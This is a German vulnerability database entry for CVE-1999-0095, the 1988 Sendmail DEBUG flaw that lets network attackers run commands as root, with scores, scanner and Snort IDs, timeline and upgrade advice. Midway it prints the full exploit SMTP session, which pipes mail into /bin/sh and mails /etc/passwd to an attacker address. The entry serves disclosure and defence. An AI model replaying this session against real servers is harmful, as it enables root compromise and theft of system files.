Berkeley Sendmail bis 5.58 DEBUG erweiterte Rechte

CVSS Meta Temp ScoreAktueller Exploitpreis (≈)CTI Interest Score
9.4$0-$5k0.00

Zusammenfassunginfo

In Berkeley Sendmail bis 5.58 wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Komponente DEBUG Handler. Durch Manipulation mit unbekannten Daten kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Die Identifikation der Schwachstelle findet als CVE-1999-0095 statt. Der Angriff lässt sich über das Netzwerk starten. Darüber hinaus steht ein Exploit zur Verfügung. Diese Schwachstelle hat aufgrund ihres Hintergrunds und ihrer Rezeption eine historische Bedeutung. Es wird geraten, die betroffene Komponente zu aktualisieren.

Detailsinfo

Es wurde eine sehr kritische Schwachstelle in Berkeley Sendmail bis 5.58 (Mail Server Software) gefunden. Hiervon betroffen ist eine unbekannte Funktionalität der Komponente DEBUG Handler. Durch Manipulation mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Im Rahmen von CWE wurde eine Klassifizierung als CWE-269 vorgenommen. Die Auswirkungen sind bekannt für Vertraulichkeit, Integrität und Verfügbarkeit. Die Zusammenfassung von CVE lautet:

the debug command in sendmail is enabled allowing attackers to execute commands as root.

Die Schwachstelle wurde am 07.11.1988 als CA-1988-01 in Form eines bestätigten Advisories (CERT.org) publiziert. Das Advisory findet sich auf cert.org. Die Identifikation der Schwachstelle wird mit CVE-1999-0095 vorgenommen. Der Angriff kann über das Netzwerk erfolgen. Zur Ausnutzung ist keine spezifische Authentisierung erforderlich. Es sind zwar keine technische Details, jedoch ein öffentlicher Exploit zur Schwachstelle bekannt. Die Beschaffenheit der Schwachstelle lässt vermuten, dass ein Exploit momentan zu etwa USD $0-$5k gehandelt werden wird (Preisberechnung vom 27.10.2025). Diese Schwachstelle wird durch das MITRE ATT&CK als Angriffstechnik T1068 bezeichnet. Die Ausprägung dieser Schwachstelle führt zu einem gewissen historischen Interesse an ihr.

Ein öffentlicher Exploit wurde in SMTP geschrieben und schon vor und nicht nach dem Advisory veröffentlicht. Der Download des Exploits kann von exploit-db.com geschehen. Er wird als hoch funktional gehandelt. Vor einer Veröffentlichung handelte es sich 61 Tage um eine Zero-Day Schwachstelle. Während dieser Zeit erzielte er wohl etwa $5k-$25k auf dem Schwarzmarkt. Für den Vulnerability Scanner Nessus wurde am 22.08.1999 ein Plugin mit der ID 10247 (Sendmail DEBUG/WIZ Remote Command Execution) herausgegeben, womit die Existenz der Schwachstelle geprüft werden kann. Es wird der Family SMTP problems zugeordnet und im Kontext r ausgeführt. Der kommerzielle Vulnerability Scanner Qualys bietet das Plugin 74131 (Berkeley Sendmail DEBUG Vulnerability) zur Prüfung der Schwachstelle an. Der durch den Exploit genutzte Code gestaltet sich wie folgt:

220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from: </dev/null>
250 OK
rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
250 OK
data
354 Start mail input; end with <CRLF>.<CRLF>
mail [email protected] </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

Ein Aktualisieren auf die Version 5.59 vermag dieses Problem zu lösen. Mit der Einstellung Disable Debug kann das Problem auch adressiert werden. Als bestmögliche Massnahme wird das Upgrade auf eine neue Version empfohlen. Angriffe können durch Snort ID 663 erkannt werden.

Unter anderem wird der Fehler auch in den Datenbanken von X-Force (125), Exploit-DB (19028), Tenable (10247), SecurityFocus (BID 1†) und OSVDB (195†) dokumentiert. Mit dieser Schwachstelle verwandte Einträge finden sich unter VDB-13666. Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Produktinfo

Typ

Hersteller

Name

Version

Lizenz

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍

CVSSv3info

VulDB Meta Base Score: 9.8
VulDB Meta Temp Score: 9.4

VulDB Base Score: 9.8
VulDB Temp Score: 9.4
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VektorKomplexitätAuthentisierungVertraulichkeitIntegritätVerfügbarkeit
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten

VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Zuverlässigkeit: 🔍

NVD Base Score: 🔍

Exploitinginfo

Klasse: Erweiterte Rechte
CWE: CWE-269 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍

Physisch: Nein
Lokal: Nein
Remote: Ja

Verfügbarkeit: 🔍
Zugang: öffentlich
Status: Hoch funktional
Programmiersprache: 🔍
Download: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Preisentwicklung: 🔍
Aktuelle Preisschätzung: 🔍

0-Dayfreischaltenfreischaltenfreischaltenfreischalten
Heutefreischaltenfreischaltenfreischaltenfreischalten

Nessus ID: 10247
Nessus Name: Sendmail DEBUG/WIZ Remote Command Execution
Nessus Datei: 🔍
Nessus Risiko: 🔍
Nessus Family: 🔍
Nessus Context: 🔍

OpenVAS ID: 10247
OpenVAS Name: Sendmail DEBUG
OpenVAS Datei: 🔍
OpenVAS Family: 🔍

Qualys ID: 🔍
Qualys Name: 🔍

Exploit-DB: 🔍

Threat Intelligenceinfo

Interesse: 🔍
Aktive Akteure: 🔍
Aktive APT Gruppen: 🔍

Gegenmassnahmeninfo

Empfehlung: Upgrade
Status: 🔍

0-Day Time: 🔍

Upgrade: Sendmail 5.59
Config: Disable Debug

Snort ID: 663
Snort Message: SERVER-MAIL Sendmail rcpt to command attempt
Snort Klasse: 🔍
SourceFire IPS: 🔍
ISS Proventia IPS: 🔍

Timelineinfo

01.08.1988 🔍
01.08.1988 +0 Tage 🔍
01.10.1988 +61 Tage 🔍
01.10.1988 +0 Tage 🔍
07.11.1988 +37 Tage 🔍
22.08.1999 +3940 Tage 🔍
12.09.2002 +1117 Tage 🔍
23.10.2002 +40 Tage 🔍
16.06.2014 +4254 Tage 🔍
27.10.2025 +4151 Tage 🔍

Quelleninfo

Advisory: CA-1988-01
Status: Bestätigt

CVE: CVE-1999-0095 (🔍)
GCVE (CVE): GCVE-0-1999-0095
GCVE (VulDB): GCVE-100-13611
X-Force: 125
SecurityFocus: 1 - Berkeley Sendmail DEBUG Vulnerability
OSVDB: 195 - Sendmail debug Arbitrary Command Execution
Vulnerability Center: 209 - SendMail Debug Allows Command Execution, High

scip Labs: https://www.scip.ch/?labs.20161013
Siehe auch: 🔍

Eintraginfo

Erstellt: 16.06.2014 14:34
Aktualisierung: 27.10.2025 20:00
Anpassungen: 16.06.2014 14:34 (82), 07.05.2019 10:51 (9), 11.11.2024 13:27 (16), 03.04.2025 03:37 (1), 27.10.2025 20:00 (2)
Komplett: 🔍
Cache ID: 216:FBB:103

Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Diskussion

Bisher keine Kommentare. Sprachen: de + en.

Bitte loggen Sie sich ein, um kommentieren zu können.

Want to know what is going to be exploited?

We predict KEV entries!